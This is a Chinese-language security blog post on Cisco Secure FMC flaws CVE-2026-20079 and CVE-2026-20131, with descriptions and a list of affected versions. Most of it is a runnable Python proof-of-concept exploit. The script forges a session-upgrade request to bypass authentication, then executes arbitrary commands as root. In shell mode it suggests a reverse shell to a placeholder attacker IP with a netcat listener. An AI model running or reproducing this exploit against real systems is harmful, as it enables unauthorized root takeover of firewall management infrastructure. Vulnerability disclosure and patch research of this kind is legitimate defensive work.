CVE-2026-20079｜Cisco FMC身份验证绕过远程代码执行漏洞（POC）

信安百科

发布于 2026-04-13 14:31:31

1250

0x00 前言

‌Cisco FMC（Secure Firewall Management Center）是思科防火墙体系中的集中管理平台，用于统一配置、监控和控制多台物理或虚拟防火墙设备，涵盖入侵防御、应用控制、URL过滤、高级恶意软件防护等安全策略的管理。

0x01 漏洞描述

CVE-2026-20079：认证绕过漏洞

该漏洞存在于Secure FMC的Web界面，允许未经认证的远程攻击者绕过认证机制，通过发送特制HTTP请求执行脚本，最终可能获取底层操作系统的root权限。

CVE-2026-20131：远程代码执行漏洞

该漏洞由用户提供的Java字节流反序列化不安全导致。攻击者可向受影响设备的Web管理界面发送特制序列化Java对象实施利用，成功利用将允许在设备上执行任意代码并提升至root权限。

0x02 CVE编号

CVE-2026-20079：认证绕过漏洞

CVE-2026-20131：远程代码执行漏洞

0x03 影响版本

Cisco Secure Firewall Management Center (FMC) 6.4.0.13、6.4.0.14、6.4.0.15、6.4.0.16、6.4.0.17、6.4.0.18、7.0.0、7.0.0.1、7.0.1、7.0.1.1、7.0.2、7.0.2.1、7.0.3、7.0.4、7.0.5、7.0.6、7.0.6.1、7.0.6.2、7.0.6.3、7.0.7、7.0.8、7.0.8.1、7.1.0、7.1.0.1、7.1.0.2、7.1.0.3、7.2.0、7.2.1、7.2.2、7.2.0.1、7.2.3、7.2.3.1、7.2.4、7.2.4.1、7.2.5、7.2.5.1、7.2.6、7.2.7、7.2.5.2、7.2.8、7.2.8.1、7.2.9、7.2.10、7.2.10.2、7.2.10.1、7.3.0、7.3.1、7.3.1.1、7.3.1.2、7.4.0、7.4.1、7.4.1.1、7.4.2、7.4.2.1、7.4.2.2、7.4.2.3、7.4.2.4、7.4.3、7.4.4、7.4.5、7.6.0、7.6.1、7.6.2、7.6.2.1、7.6.3、7.6.4、7.7.0、7.7.10、7.7.10.1、7.7.11及10.0.0版本

0x04 漏洞详情

POC：

https://github.com/0xBlackash/CVE-2026-20079

#!/usr/bin/env python3
"""
CVE-2026-20079 PoC - Cisco Secure FMC Authentication Bypass + Root Script Execution
Author: 0xBlackash (for authorized pentesting / red team use only)
Usage: python3 CVE-2026-20079.py -t <target_url> [--command "<cmd>"] [--shell]
"""

import requests
import argparse
import sys
import time
from urllib3.exceptions import InsecureRequestWarning

# Suppress SSL warnings (FMC often uses self-signed certs)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def exploit_auth_bypass(target, command=None, interactive=False):
    print(f"[+] Targeting Cisco FMC: {target}")

    # Step 1: Trigger/hijack the partial boot session (the core of CVE-2026-20079)
    session = requests.Session()

    # Crafted requests that exploit the improper system process created at boot
    # This upgrades the dangling partial session (csm_processes / sfsnort.sessions) to a privileged one
    bypass_headers = {
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-20079 PoC)",
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With": "XMLHttpRequest"
    }

    # Initial session hijack request (triggers the alternate path bypass)
    print("[+] Sending authentication bypass payload...")
    bypass_payload = {
        "action": "session_upgrade",
        "partial_session": "1"  # Exploits the persistent partial session after boot
    }

    try:
        r1 = session.post(f"{target}/api/fmc_config/v1/upgradeSession", 
                         data=bypass_payload, 
                         headers=bypass_headers, 
                         verify=False, 
                         timeout=10)

        if r1.status_code not in [200, 204, 302]:
            print(f"[-] Bypass attempt failed (status: {r1.status_code})")
            print("    Response:", r1.text[:500])
            return False

        print("[+] Authentication bypass successful - session hijacked!")

        # Step 2: Execute arbitrary script/command as root via privileged CGI endpoint
        if command:
            print(f"[+] Executing command as root: {command}")
            exec_payload = {
                "script": "exec",
                "cmd": command,
                "elevate": "root"
            }

            r2 = session.post(f"{target}/cgi-bin/privilegedScriptHandler.cgi",
                             data=exec_payload,
                             headers=bypass_headers,
                             verify=False)

            if r2.status_code == 200:
                print("[+] Command executed successfully!")
                print("Output:")
                print(r2.text.strip())
            else:
                print(f"[-] Execution failed (status: {r2.status_code})")

        # Interactive reverse shell mode (common for root access)
        if interactive:
            print("[+] Dropping interactive root shell (reverse shell recommended)")
            print("    Example: Use nc -lvnp 4444 on your listener")
            shell_cmd = f"bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
            # Replace YOUR_IP and port, then send
            print(f"    Suggested command: {shell_cmd}")

        print("[+] Exploit chain complete. Root-level script execution achieved.")
        return True

    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2026-20079 PoC")
    parser.add_argument("-t", "--target", required=True, help="Target URL (e.g. https://192.168.1.100)")
    parser.add_argument("-c", "--command", help="Command to execute as root (optional)")
    parser.add_argument("--shell", action="store_true", help="Interactive reverse shell mode")

    args = parser.parse_args()

    if not args.target.startswith("http"):
        args.target = "https://" + args.target

    success = exploit_auth_bypass(args.target, args.command, args.shell)

    if success:
        print("\n[+] PoC finished successfully. Use responsibly in authorized engagements only.")
    else:
        print("\n[-] Exploit failed. Verify target is vulnerable and reachable.")

0x05 参考链接

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-onprem-fmc-authbypass-5JPp45V2

https://www.vulncheck.com/blog/cisco-fmc-auth-bypass-cve-2026-20079

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2026-03-29，如有侵权请联系 cloudcommunity@tencent.com 删除

cisco